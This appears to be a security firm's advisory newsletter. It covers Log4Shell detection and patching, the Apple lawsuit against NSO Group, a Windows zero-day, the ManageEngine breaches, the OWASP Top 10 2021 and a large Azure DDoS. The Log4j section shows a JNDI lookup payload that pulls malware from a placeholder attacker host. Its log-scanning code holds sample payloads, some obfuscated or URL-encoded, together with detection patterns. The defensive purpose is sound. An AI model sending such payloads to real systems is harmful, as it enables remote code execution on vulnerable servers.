Log4j Update – What You Need to Know

Overview

On December 10th, 2021, CVE-2021-44228 (Log4Shell) was released affecting the Log4j Java logging framework. This vulnerability received the highest possible CVSS score of 10 out of 10. Three other vulnerabilities related to Log4j have been released since then, but the original is by far the most critical. It was initially discovered by Chen Zhaojun of Alibaba’s security team on November 24th, 2021, and then privately disclosed to Apache. The risk from this vulnerability is so severe that, as a precautionary measure, Canada shut down 4,000 government sites. Since the public release there have been reports of millions of attempts to exploit the vulnerability across the world, but as of January 10th, CISA stated they had not seen any significant intrusions related to Log4j.

So, what is Log4j, what makes it so vulnerable, and how do you exploit it?

Log4j is a piece of software, surprisingly developed and maintained by a group of volunteers, that is written in Java and logs user activity on computers. An example of activity that is captured and logged would be navigating to a nonworking link on a web page and receiving a 404 error. Log4j is also used for diagnostic messages in software, such as the amount of memory being used and the commands a user has entered. The logging of this information isn’t the issue; the problem is that the code actively interprets the activity it is logging, which means remote code can be executed. Within Log4j there is a lookup feature, backed by the Java Naming and Directory Interface (JNDI), that evaluates expressions wrapped in ${…} inside logged messages. This feature allows live lookups both inside and outside of your network. With the correct sequence of input, it can be used to place malware on the server and gain full remote code execution on the host. An example input of ${jndi:ldap://myattackingmachine:9999/Malware} would reach out to the attacking machine on port 9999 and download the malware file being hosted there.

Products affected

The image below, courtesy of xkcd, describes the impact of this vulnerability perfectly.

At this time it is almost safe to assume that all products are affected, as Log4j has been discovered deeply embedded in so many pieces of software, including some whose vendors were not aware it was there. Affected popular products include Minecraft, Apple’s iCloud, AWS, the NSA’s reverse engineering tool Ghidra, and the list goes on. CISA continues to update its GitHub repository with a list of products known to be affected.

Detection & Patching

To discover what systems to patch, here are a few steps to take:

  1. Identify any internet facing assets.
  2. Use authenticated vulnerability scanning to detect devices that have been impacted.
  3. If you have an endpoint detection and response (EDR) system, you can use that to search for Log4j files.
  4. Determine the version of Log4j being used. Versions 2.0 through 2.14.1 are vulnerable.
  5. Update to the current version 2.17.1.
  6. Repeat the above steps on internal IT and OT systems.
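
Steps 3 to 5 can be scripted. The following is an added example, not nGuard’s tooling and not the CISA or Huntress scanner: it walks a directory tree, checks whether each jar bundles the JNDI lookup class (assumed to live at org/apache/logging/log4j/core/lookup/JndiLookup.class, as in log4j-core), reads the manifest’s Implementation-Version (assumed to be set, as Maven-built jars do), and applies the 2.0 through 2.14.1 range from step 4; build_sample_tree() writes constructed fixture jars so it runs offline.

```python
import re
import tempfile
import zipfile
from pathlib import Path

VULN_MIN, VULN_MAX = (2, 0, 0), (2, 14, 1)  # vulnerable range stated in the advisory
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"  # the JNDI lookup feature

def parse_version(text):
    """Turn '2.14.1' into a comparable (major, minor, patch) tuple, or None."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text.strip())
    return (int(m[1]), int(m[2]), int(m[3] or 0)) if m else None

def inspect_jar(jar_path):
    """Return (version, has_jndi_lookup) from the jar's manifest and class list."""
    version, has_jndi = None, False
    try:
        with zipfile.ZipFile(jar_path) as zf:
            has_jndi = JNDI_CLASS in zf.namelist()
            manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
            for line in manifest.splitlines():
                if line.startswith("Implementation-Version:"):
                    version = parse_version(line.split(":", 1)[1])
    except (zipfile.BadZipFile, KeyError, OSError):
        pass  # not a zip, or no manifest: the version stays unknown
    return version, has_jndi

def classify(version, has_jndi):
    """'vulnerable' for 2.0..2.14.1 with the lookup class; 'review' if the class is bundled but unversioned (shaded jar); else 'ok'."""
    if not has_jndi:
        return "ok"
    if version is None:
        return "review"
    return "vulnerable" if VULN_MIN <= version <= VULN_MAX else "ok"

def scan_tree(root):
    """Map each jar file name under root to (version, has_jndi_lookup, status)."""
    return {jar.name: (*info, classify(*info))
            for jar in Path(root).rglob("*.jar") if (info := inspect_jar(jar))}

def build_sample_tree():
    """Constructed fixtures, not real Log4j jars: vulnerable 2.14.1, patched 2.17.1, a shaded app jar, an unrelated library."""
    root = Path(tempfile.mkdtemp(prefix="log4j-demo-"))
    fixtures = {"lib/log4j-core-2.14.1.jar": ("2.14.1", True), "lib/log4j-core-2.17.1.jar": ("2.17.1", True),
                "app/shaded-app.jar": (None, True), "lib/other-lib.jar": ("1.3", False)}
    for rel, (ver, bundles_lookup) in fixtures.items():
        (root / rel).parent.mkdir(parents=True, exist_ok=True)
        with zipfile.ZipFile(root / rel, "w") as zf:
            if ver:
                zf.writestr("META-INF/MANIFEST.MF", f"Implementation-Version: {ver}\n")
            if bundles_lookup:
                zf.writestr(JNDI_CLASS, b"")
    return root
```

A 'review' result is the case step 4 alone misses: an application jar that shades log4j-core in without carrying its version.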

To prevent Log4j from being exploited, there are a few steps to take.

  1. Search logs for IPs known to be scanning for the vulnerability and add them to your block list. A running list of known IPs can be found here.
  2. Block the list of IPs that have been used to host malicious payloads that exploit the vulnerability.
  3. Review the list of IOCs being updated by Microsoft.
  4. Review the additional list of IOCs being updated by the Curated Intelligence Trust Group.
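
One way to carry out the log search in step 1, added here as an example and not part of the advisory or of any tool it links: it parses combined-format web server log lines (constructed sample lines using documentation IP ranges), undoes URL-encoding and the single-character ${lower:}, ${upper:} and ${…:-} nesting used to hide the lookup string, and counts hits per source IP so they can be reviewed for your block list.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Nested lookups that resolve to one character, e.g. ${lower:J}, ${upper:n}, ${::-d}, ${env:X:-i}.
# Unwrapping them repeatedly reduces the common evasions back to a plain ${jndi:...} string.
CHAR_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}])\}|\$\{[^${}]*:-([^${}])\}", re.I)
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.I)
# Combined log format: the lookup string can arrive in the request line, Referer or User-Agent.
CLF = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<req>[^"]*)" \d+ \S+ '
                 r'"(?P<ref>[^"]*)" "(?P<ua>[^"]*)"')

# Constructed sample lines (RFC 5737 documentation addresses), not taken from a real incident.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:14:02:11 +0000] "GET /${jndi:ldap://198.51.100.7:1389/a} HTTP/1.1" 404 153 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Dec/2021:14:02:12 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "${${lower:j}ndi:ldap://198.51.100.7:1389/a}"',
    '198.51.100.23 - - [10/Dec/2021:14:03:40 +0000] "GET /login HTTP/1.1" 200 1024 "-" "%24%7B%24%7B%3A%3A-j%7Dndi%3Aldap%3A%2F%2F198.51.100.7%2Fx%7D"',
    '192.0.2.44 - - [10/Dec/2021:14:04:01 +0000] "GET /docs/${version} HTTP/1.1" 200 2048 "-" "curl/7.68.0"',
]

def normalize(text, rounds=5):
    """URL-decode and strip one-character lookups until the text stops changing."""
    for _ in range(rounds):
        before = text
        text = CHAR_LOOKUP.sub(lambda m: m.group(1) or m.group(2), unquote(text))
        if text == before:
            break
    return text

def has_jndi_lookup(text):
    """True when the normalized text contains a ${jndi: lookup; other ${...} lookups are ignored."""
    return bool(JNDI.search(normalize(text)))

def suspicious_ips(log_lines):
    """Count, per source IP, the requests that carried a JNDI lookup in any logged field."""
    hits = Counter()
    for line in log_lines:
        m = CLF.match(line)
        if m and any(has_jndi_lookup(m.group(f)) for f in ("req", "ref", "ua")):
            hits[m.group("ip")] += 1
    return hits
```

Run suspicious_ips() over your real access logs and treat the result as a review queue, not an automatic block list, since scanners also hide behind shared or proxied addresses.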

Additional links

There have been many articles and resources published since the release of this vulnerability, so in addition to the links in this Security Advisory, nGuard wanted to provide a few additional resources for further reading.

  • If you want to try and exploit the vulnerability yourself, John Hammond and TryHackMe have created a room for you to do so. https://tryhackme.com/room/solar
  • A growing list of Tenable Nessus plugins being released for detection of Log4j. https://community.tenable.com/s/article/Plugins-associated-with-CVE-2021-44228-Log4Shell
  • The team at Huntress has had great coverage and updates, including an open-source tool to help detect the vulnerability. https://log4shell.huntress.com/
  • The National Cyber Security Centrum (NCSC-NL) has been maintaining another GitHub repository with a list of information for hunting, IOCs, detection and mitigation, scanning, and vulnerable software. https://github.com/NCSC-NL/log4shell
  • CISA Released an open-source Log4j Scanner. https://github.com/cisagov/log4j-scanner

If you feel you need assistance with the detection of vulnerable Log4j instances, have discovered a Log4j related incident, or need general security services related to this vulnerability or anything else, reach out to nGuard. nGuard offers Log4j scanning, consulting services, log management and event collection, and penetration testing services.  


Apple Sues Spyware Firm NSO Group

If you are not familiar with NSO Group, nGuard released a Security Advisory in August detailing the history of the NSO Group and their spyware platform, Pegasus. If you haven’t read the advisory, check it out here, or you can watch the summary video below:

In late November, Apple announced that it is suing the Israeli spyware firm NSO Group and its parent company OSY Technologies for targeting its users with their spyware. This is the second lawsuit against NSO Group, the first coming from Facebook, now owned by Meta, for targeting its users on the messaging application WhatsApp.

In addition to the lawsuit, which is seeking unspecified damages, Apple is requesting that NSO Group be banned from using Apple software, services, or devices. NSO Group created over 100 fake Apple IDs used to deploy their spyware Pegasus, which violates the iCloud terms of service. NSO Group still states they only sell spyware to governments for lawful interception and says, “Thousands of lives were saved around the world thanks to NSO Group’s technologies used by its customers.” Although NSO Group states it has ethical purposes, evidence has shown otherwise and has led the United States to implement sanctions and a blacklist on them for enabling “transnational repression.”

Apple did release software updates to patch the vulnerabilities exploited by NSO Group and has not seen any indications of Pegasus or any other NSO tools being used against their latest software, iOS 15. Apple has strongly urged iOS users to upgrade to the latest version of software to protect themselves from these types of attacks.


URGENT Windows Zero-Day | InstallerFileTakeover

Yesterday afternoon Bleeping Computer reported on a critical Windows zero-day affecting all flavors of Windows client and server operating systems. A flaw in Microsoft’s patch for CVE-2021-41379 led to a post-authentication privilege escalation vulnerability that allows an attacker to pivot from a standard user account to NT AUTHORITY\SYSTEM with ease. Considering that there is currently no patch, it is essential that organizations begin alerting on this before breaking for Thanksgiving. Inform yourself and your team by reviewing the materials below.

Resources:

  • Bleeping Computer Disclosure Article
  • Born’s Tech Additional Information
  • GitHub PoC Exploit Code
  • /r/cybersecurity Detection Information


Several Organizations Breached By Foreign Hackers

On Monday, CNN reported that nine organizations spread across multiple sectors have been breached by what is believed to be foreign hackers. Palo Alto made it known to CNN that organizations within health care, technology, education, defense, and energy had all been the target of recent security breaches. It is also being reported that officials from the NSA and CISA are actively tracking the threat and working to mitigate it.

By exploiting a vulnerability in ManageEngine ADSelfService Plus, which corporations use for password management, and stealing passwords from the targeted organizations, attackers have been able to maintain persistent access to internal networks. This buys the attackers time to further their attack vectors and compromise more endpoints, as well as to compromise high-privilege accounts and increase their chances of accessing critical information. The Palo Alto official who provided this information to CNN believes this is just the “tip of the spear” of a likely spying campaign by foreign adversaries.

While it is currently unknown who is responsible for this attack, Palo Alto is reporting that many of the tactics and toolkits discovered are consistent with a suspected Chinese hacking group. The NSA and CISA, when asked to comment on the likely identity of these hackers, refused to comment. Officials from Palo Alto are stressing that it is extremely important to stay on top of software updates. Attackers are exploiting well known software vulnerabilities that could have been easily patched by the target organization. They are also encouraging organizations that utilize Zoho software to update their systems and search for signs of potential breach.

Vulnerable software is one of the top things attackers look for when attempting to target an organization. Many times, these vulnerabilities and their corresponding exploits are widely known and easily preventable if you are aware of them. Conducting periodic penetration testing on both the external perimeter and the internal network can prevent these vulnerabilities from being present in your environment. Additionally, having vulnerability scans run on a regular basis can make you aware of these critical vulnerabilities so your security team can eliminate them from the environment.


OWASP Top 10 2021 Update

The Open Web Application Security Project (OWASP) is a non-profit organization focused on improving the security of web application software. OWASP uses a community input model which welcomes input and contribution from the public. The Top 10 is a guidance document that ranks what the community believes are the ten most critical security risks that web applications face. Each risk is ranked by frequency discovered, severity of vulnerabilities, and potential impact.

OWASP recently released an update to its top 10 web application security threats for 2021. The last update to the list was in 2017, so this was long overdue. With the ever-changing landscape in web application security, for 2021 OWASP has introduced 3 new categories, changed the names of categories, and consolidated a few items. OWASP stated this is to “focus on the root cause over the symptom.” Below is a summary of the changes:

(Image: summary of the changes from the 2017 to the 2021 Top 10. Source: OWASP.org)

The 3 new categories are:

  1. A04:2021 - Insecure Design
  2. A08:2021 - Software & Data Integrity Failures
  3. A10:2021 - Server-Side Request Forgery (SSRF)

To update the Top 10, OWASP utilized data from researchers for 8 of the top 10 categories and, similar to 2017, included 2 from their community survey. Often, the data is a lagging indicator for threats that the community on the front lines already sees as the top threats, and some of these threats may never be reflected in the data. It takes time to fine-tune a testing methodology for a new threat, and more time to create a way to test for it in an automated fashion.

There are data factors listed for each of the Top 10 categories; here is what they mean:

  • CWEs Mapped: The number of CWEs mapped to a category by the Top 10 team.
  • Incidence Rate: The percentage of applications vulnerable to that CWE from the population tested by that organization for that year.
  • Weighted Exploit: The Exploit sub-score from CVSSv2 and CVSSv3 scores assigned to CVEs mapped to CWEs, normalized, and placed on a 10pt scale.
  • Weighted Impact: The Impact sub-score from CVSSv2 and CVSSv3 scores assigned to CVEs mapped to CWEs, normalized, and placed on a 10pt scale.
  • (Testing) Coverage: The percentage of applications tested by all organizations for a given CWE.
  • Total Occurrences: Total number of applications found to have the CWEs mapped to a category.
  • Total CVEs: Total number of CVEs in the NVD DB that were mapped to the CWEs mapped to a category.

If you need to assess one of your web applications against the new OWASP Top 10, nGuard’s web application penetration testing is driven by the OWASP Top 10 and all findings are issued with a correlation to the application item within the top 10. Identify your weak points using the industry standard for web application assessments today!


Microsoft Azure Mitigates Impressive DDoS Attack

Microsoft is reporting that nearly 70,000 sources spread across the globe are responsible for one of the largest cyber-attacks in history. A Distributed Denial-of-Service (DDoS) attack is a cyber-attack in which the adversary attempts to make a machine or network resource unavailable to its intended users by flooding the target machine with requests in an attempt to overload the system. A report by Link11 suggests that DDoS attacks are on the rise, as we have seen a 33 percent increase during the first half of 2021.

Microsoft reports that the attack, while lasting only around 10 minutes, was one of the most significant they have ever seen. Bursts of traffic that peaked at 2.4 Tbps were used in an attempt to cripple servers and prevent legitimate traffic from reaching its target. While DDoS attacks on their own can be devastating for organizations with internet facing services, many times they are used as a distraction for an even more sophisticated attack. An attacker with persistent access to an internal network may use an external DDoS attack to distract IT staff while ransomware is deployed across the internal network.

The Azure security team was able to confirm that all services remained online during the attack due to security controls that mitigate the effect of large-scale DDoS attacks. How would your organization’s internet facing infrastructure hold up against an attack like this? Here are some mitigating steps:

  1. Reduce Attack Surface – Limiting the internet facing attack landscape is the best way to reduce the risk of DDoS attacks.
  2. Scaling – Scaling your infrastructure to absorb a large-scale DDoS attack can be a great way to mitigate risk. Utilizing Content Distribution Networks (CDNs) or Load Balancers to spread traffic out across multiple servers can limit the effect overwhelming amounts of traffic can have on a single server.
  3. Know What is Normal – Having a general idea of what is a normal amount of traffic and what is not can assist you in configuring technologies to protect against DDoS attacks. Configuring proper rate limiting and traffic analysis to block illegitimate traffic could save you a major headache.
  4. Deploy Sophisticated Controls – Web Application Firewalls (WAFs) are sophisticated tool sets that can detect and block these types of attacks. They can be configured to protect your application by blocking source IPs, whitelisting specific geo-locations, and stopping illegitimate requests in their tracks.
  5. Penetration Testing – Performing external and web application penetration tests can point you to vulnerabilities that would be at risk of a DDoS attack. Patching these holes on your external perimeter may save your organization from experiencing unproductive downtime.

